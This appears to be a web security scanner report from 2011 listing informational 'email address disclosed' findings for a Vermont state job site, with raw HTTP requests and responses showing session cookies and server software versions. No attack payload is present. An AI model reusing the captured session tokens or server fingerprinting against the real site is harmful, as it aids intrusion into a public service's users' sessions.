Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:11:56'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/1p.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 49
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/global/images/1p.gif
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/error.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Content-Length: 898
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/global/images/error.gif
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:07:36 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/kswksbgd.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 66
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/global/images/kswksbgd.gif
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:54 GMT
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/images/printericonA.png HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/works/Login.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Content-Length: 167
Content-Type: image/png
Content-Location: https://www.vermontjoblink.com/ada/global/images/printericonA.png
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:08:05 GMT
The following email addresses were disclosed in the response:
amix@amix.dk
joseph.lucia@state.vt.us
Request
GET /ada/global/spellchecker/googiespell/AJS.js HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 41910
Content-Type: application/x-javascript
Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/AJS.js
Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT
Accept-Ranges: bytes
ETag: "08c55c3c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:51 GMT

/* Last Modified: 29/04/07 18:44:48
AJS JavaScript library A very small library with a lot of functionality AUTHOR 4mir Salihefendic (http://amix.dk) - amix@amix.dk LICENSE Copyright (c) 2006 Amir Salihefendic. All rights reserved. Copyright (c) 2005 Bob Ippolito. All rights reserved. http://www.opensource.org/licenses/mit-license.php VERSION
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/spellchecker/googiespell/cookiesupport.js HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 718
Content-Type: application/x-javascript
Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/cookiesupport.js
Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT
Accept-Ranges: bytes
ETag: "08c55c3c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:52 GMT
The following email addresses were disclosed in the response:
amix@amix.dk
joseph.lucia@state.vt.us
Request
GET /ada/global/spellchecker/googiespell/googiespell.js HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Content-Length: 35139
Content-Type: application/x-javascript
Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/googiespell.js
Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT
Accept-Ranges: bytes
ETag: "08c55c3c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:51 GMT
/****
 Last Modified: 13/05/07 00:25:28

 GoogieSpell
     Google spell checker for your own web-apps :)
 Copyright Amir Salihefendic 2006
     LICENSE
         GPL (see gpl.txt for more information ...[SNIP]... rietary software!
         There is another license that permits you to use this script with proprietary software. Check out:... for more info.
     AUTHOR
         4mir Salihefendic (http://amix.dk) - amix@amix.dk
     VERSION
         4.0
 ****/
var GOOGIE_CUR_LANG = null;
var GOOGIE_DEFAULT_LANG = "en";
function GoogieSpell(img_dir, server_url) {
    var cookie_value;
    var lang;
    cookie_value = getCoo ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/style/cfmstyle.css?appname=Vermont&maindir=/ada&cssversion=8 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:06:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT
Content-Type: text/css
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/leavesite.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
